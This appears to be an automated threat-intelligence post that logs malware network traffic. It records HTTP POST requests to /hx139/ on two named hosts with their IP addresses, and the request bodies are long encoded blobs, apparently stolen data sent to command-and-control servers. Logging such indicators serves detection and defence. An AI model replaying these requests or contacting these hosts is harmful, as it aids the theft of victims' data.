S1rxbaW7AaHmc8IY0PQeTVy9MalMxRhJPM7_lTHC_27XKkC3FI8kRVFr86vHGQF15OwdOyHeUrNmYm8O1fCe3To92snpgbos7EWD9mTAeFwgvn2VRYHkRQCIAqSEsGeSBdU0TsyUox2Qmo6Z5xOzPdwFb7eOo3AyfKnf2GoYyOx4LY9opMJi8xMMsjHubpDyvMXNW8FYY7Vil-wY0CWcooQGymm5tq48jEG_3d9xdQzqnO8y2UFDhOqXli-tls38C4Q18B6o05sm7Rzp-RroYogxQPXmanBNl8k4-Av-p_fGt3xsA0ku2MCMoVzOP-602K9y9D80fOYkUiJVz_gmZC-kCC-cufF9NhbzeYzkCZzwljKZqPWB628Nquzkr_l-b4pjDvpp0fNMCqwqZsY2O1HFI09y2xanXkWEEyz-Aw6L&un=U2V2ZW4wMQ==&br=9\x00\x00
http://www.bastblossoz.info/hx139/
- Hostname: www.bastblossoz.info
- IP Address: 185.62.189.222
- Port: 80
- Count: 1
POST /hx139/ HTTP/1.1 Host: www.bastblossoz.info Connection: close Content-Length: 42949 Cache-Control: no-cache Origin: http://www.bastblossoz.info User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.bastblossoz.info/hx139/ Accept-Language: en-US Accept-Encoding: gzip, deflate dat=mBTTpTKVXJWv0jl26m3V5zZdxbPUp4HsCywRWe8KtohX53X6HqWNjrIqOe0MwYlf9EaBY5dY3WCiMfXoIy0ravPKUPlo6jqfgMdZDR3WKsMn72yEx7ZxEx1a-cXbPXxaTKTaN58KK5Hacn53WMbXa7NQ6H3HVTpN9vjND5Mykir5hsMZzbUWLznPabyGHGKyPj4crceKZDGddNQS_AuZ6Tm61TXh1vwmDWMbyIzjR8HqyNtgXDwHhBLKZYe0grnoTSL_RAy-rVd2vg2arGfX-3nc5HPoUdyo70Wm2ja22zoO2DV69siRdaSW7n3FExSrjabIKJYv5tF2QQI1tYZc8UtjTeZUAPfWarbLvYx-jeay5zucvMM3UcD1Ux1Q1d1NVFyDejzggv9OaThTLi8DLwSUIPzMDKeUp9IFF_PN7nm0SahVxQd_PBRRapnVSm7DbdmKXW6_qoUqMzz_b0zbavBmTf9t-qmAslPweKvaEmJeikc6Wa8CtV8kG-QRCu3KO6B6VxLHtFcut3l3rA4rJqvAEDH2y5G5SrzOqK0ty8KZPOXZMCWsMw8Pssw7zQ5_anvQsswDzuVyYB6b-Jo6lRgrfUVF81a-K0shA4b11orgtmm7m4PddUZ8VAptd6sSd0NjhXX8oYGAnch39AxtM4Fetlh9h1uK-RJp9Q_uzb7RIFNuXEiwl_9JHbd4cXGAP1IN2JbiIo5PFZIb2srhw0vdKcZWs4EEoKTcT8B13quZA3T97GpGTV04s7vboQtXOBKcxIhuULhwhLbh9Kr0tVkGobgt4nuR4g0zi4RD9oWnLsfIhSDzgu9iom4nKEisY3ZwV1Jg7PSfK0sVANDVfKdZywdlVWgD36jI648jhUqdz8aelcm02KwdsS0OEpNELWXTubzIRmHOH5vFfcRpQXQ81DR_wHDskXoG-I7LWDEn7aL6aFl0UIjb4OEiSmpcD7BDe4RrbXTy_6zI9P3a7sPgbQR1rm6Av28RYXwzEyekgShpZ0W6TwQ-2sr8sgsweAuJxLIFmJ4fTchrKhxCRfyO524BQuW15PNuRnStRkku3fwXh-X0TPxraAma-P1sZuDLXEO3sp3j8TUu4XSgf6rcIOpaE9lML1RmdBuVaaaxqxCJLbbXYBMDXiPxTxYy2F61oPDm0L2TVzZDUBTK3I2RSv0cPidBMG-kRqjp_MdKUYKXOOvKc60e-A2d9OZl7VRNttuuWzGHrteLQsqCWOuuBHhss5BNH0rK1ZQQ8zU4APEmCs3rweQepqjJzs5oLBltVK-XMi74MzWqnjf_M4jVJcZ5TEGhkEK6Psusuf3A6iE0TIpUQCLhQESByKvewCINnkacyi943L-iUeeclSnAMZks32haXwARqKpb3ZMVxld2Z75J0U-Z2pCU4wa8aboGyR2lLu7h6J9lnIGb2sLlVqKuBXgByIQtr083BD6KRV98eFAKSr32eTmGTXxk7STairlybUyJRccyGpGRHej8yRNu235ft-glCvYj8EJqOHnuT3oTEB9Qv5rWyZXbhlJmwRHXEXy34OwMNzCHoWItYeekBV2LXllY0v2q0AHhli2BdZC7UwzUjwo0HtJEKpnLy1DCg7lGP2KNu4gOByXIc0fQRaXtdkMiEiUKlrQhg7yH74t6SKqFM-yvXpG-FI8ex-hxlABtqlcRvnf5wHwnHfWm0E4kXoMeonkhWrqrCUKs4vhNLC2mtHiNvlwrB5tkh0g354f075P7F98OlnrztrBkt_-txGjnzN_eQ-y9e7k0uOetE2Tn_ik7KTq_erIfG40IYZcdC678tuZE_pxvWogrckT3668hXPaXVRDahii3k9uR9iSoREiaPQCbhOOZBxVeme9yfmr6UYPtPGk9-x-DhL5WpWq_GJTnVBlJknf5epmxg_VvsICo9LBhpAWJSKhrAYP1KrNFtfP0qxTEO5pAbC5RDq_O9bIje4p88IxvUl8LkfBpwNqCksW1BpeaGObhwspgbzHsAy7sta5oohrt5PL22V3QeJbnhepUqe2BZEkNZRecd_kYRKl3O3t57dEYibmtcLM-WhYUIG-aj5bGCnKcIW2Xslzv6pCmf4Y7dUVsx1eBYkW4TvgtatELFtD_dNP_7q46T-dkuQMxnnMpSt6KZ3b4wGWtcYjMpjlm5dRACWUHB1fTsTt37-BEB1qDbdzZ2bCG4zRn9n9GcbT8axmgKZIBLqi_sFnMNyy3nLtVfULEA9oFo37jF2VoUM8h94KL53n_hSED_JNbRuwckVe-_V2Pvw8k6hF0Vnc3xcSuhLP-j6Hi8on8ivwbcbxRNHaICqTTSAdVQc6pAQ-_0SFXWXU1L3HO0_r5B2f-lHaHdyPYixG-0apm9Yh4r6PILDhq2QhxhVrbdx6XUbvmWYk
http://www.lookpresent.info/hx139/
- Hostname: www.lookpresent.info
- IP Address: 23.227.38.64
- Port: 80
- Count: 1
POST /hx139/ HTTP/1.1 Host: www.lookpresent.info Connection: close Content-Length: 42949 Cache-Control: no-cache Origin: http://www.lookpresent.info User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.lookpresent.info/hx139/ Accept-Language: en-US Accept-Encoding: gzip, deflate dat=UzWXwbG-U4PjyNqFepJD3YSfBgVdhUQw26FtP6SRGDBv0apQiIlpk6BruW0sbwWxGTYwaiCuvCaYfYxDwqFJLAOTNZwGxXffHHLbWuFMozU5uuqtDfIbTdFWEWywImfHo6nGDsx5FkoNY7Qq5SAxFTup1QmIlUWoXpt3ReYzwwr96lr1VC7Po96TpGVqVx97XEy2SV1X03oFgoeHQXnubuygpOWpU8zeLOf8eu2chIhGJ11Tge0rhDBJn_89m-lFn99tr7XgvWcKo2TCrIZ85ZBIPyB0_O9JJlCHNYMWlySA6qlqFyPuFF0OvV5QQ11Q-nPNNidsb4kbQa1379WE9aSjAKVLucM6QgShp6rJem8zqlgQ0FEgCF0XOrU_gB9If-AlUbn6GqZR-J0J235xv5EMFnQ5kpaLL-NIVuIyGtf5X5o0hibHU-3v8SctaL-R47ll7P4uxM39H6phKGl0iaPKCTkJ1W5OyMiU91wC474Z5Rnh1YH_XVrn5zna0MlfgOmBgXdXFQ0VDSVBSEfJ0GxNqyRdY6zQEvnjAWQeui58XPn4-e_1w0FcLcMWw1Z4ESszVd5pMRsQkm6xa5otfS0jTM_UcT7MS-lKEClv8aclSqTr_Zah2uYqUMsVBJZMQhFZINY4E2UkO1X_yEOyI8P1HGZxZkq3xEgknAZMmsyqpd3lmH7E8_r5joxFF0L32zBqirHO5vk3XGoKyQhDdztNsV01IueMam0kiZW69Jdgcvu0JENql_P43hYIXxvPhQ2exCg407x34VOP84vBQB1XJ9WKIWoTsO0c4lLV7-gB-lyCIHiVoFyNFVluQ6xgzo9gSl2As24qrWzCKrLyoRdSLJXWW0dTWGZ1vU_mRWGAZ3F6cZyUNyUypqGcveldMDUTnDEsMo1o5ybBqFByqEAxsGlcBhoKwJypAMtvh5uuOPb4UD-RMK3fxehGVyqucL1BCpe6773uIqHU8yy04_gJf0XnAgYkH4bqpybvAFU7OH4HU2KFpZX91LA_1PaFrztjlN1mEIkhhhwRgoiO97M-37D_TOs8x0HUlmbpx9M1oJA8Jn3Onjz2T93kJAYHk14Qhz7m9n70bXGZd_JHvPASamKSkF9Ltfw5Az4aJesaFywptFjIDSm3xyuL1_vCOTfOQvarBHjiFGoO6y5F1NYuHWekvpThk0opbEaFbgyy8GvS-WytKNxQrMdurJ75rqnHlHx8Mc8ngLSOIFoW3VWC0Wb4yMgfo0vb8dvVsOTxiTXP3CdsSpq16eE2QK7hI2EGMATyINKa3tRvONz9McTFD1py_5sOjnnTEdSmuNtZwRBZ2eM0jSnW9baQmYkwaOF2Z2bBmd-LxDqcooLHXpgNfQ9RYZ_-X1GQADN4upyExonp6cKiScmgvMtuIEH3bnw4qgBPkHbR8DUVclLjOhVBPGTwFvLOcgfQGmd65lVcfju9Ye70iQmKVzj4QhhflbK49djoirpfhvS1PsW2tY30A-b_H9ZVsSMEl2zGCVQePxiHsq20IoeBxXdJX1lhurevpiBA1qFwF8JDTXKuqTXV1XWy-UgajuI79IbeVNn1S-n_K3zcKdQLZ52pHS7lPEgE-2E4z8T2MYlaWmT1wzBjHrY_BNdcrGFf7zzx7cV5YAgTh6RhE0SHAiDTrq3idJIv2MN-8NBAr4awyz4Nvf3fIyJpZk14OS0tZfFB9vie_8c9SnvQ3lrMBdAHsv5CikYyA2MjaXArjbySm8S8AD0UFovlofLLcQEQ--Lpze_wgOvfdmo5jkV6MftFM5azhbvCAxcr8wLyY34lpvRAtW77iifr-nwxjKnYxQBy0Mm8DuHPh27tK1DFvidxKbTaMxfXgw2gKXPSK6y6PlcSO9MySWGXx8FlXYfVpralxtpmZu1voAFiEsIbA9-1WjhPC37bY9IhvpcTeyFmIIlW0MgfjaxpfS1YyfJtVcTH9mTncXTd1dCrFf3minTmw-sE3Oce7Jh1VzI458tMgPi40j9rr0u9y-E_RyZtsgIkAF_3euUPvHUCgdPm_OoOqd248BCtp2_nyOEQYyXywLJDUOOSizzy0NgvpaQq7ePhA6gKNvriSTTiiMCrk807xU80goKMYddDUVKWufMgNifviFPEgFDbcX80isjRu0_db30OZltMXEpTjBqljQOEIZqhSmkVpEbU6nt203UjFQVi7_0HUL8fELfcBHO_WQ4kpYnlS26m4YjD3nR3yNy-tjw3DaURH5jiP2kP67lNdln7wux0ziJJiD4qeLBe9RD9GISBJypJ5_5j0OOacpF26t6WuxiXJNmy4agZVO7w2uvj79RZc9Plrr8JXFMU6HTjUrDVVKknad81O1IiWskOzBerbjWNPlqUEM633oxp3WT9WsOFNnj6ZNk
#infosec #automation
TheSystem Itself @ 2017-11-02 18:54:08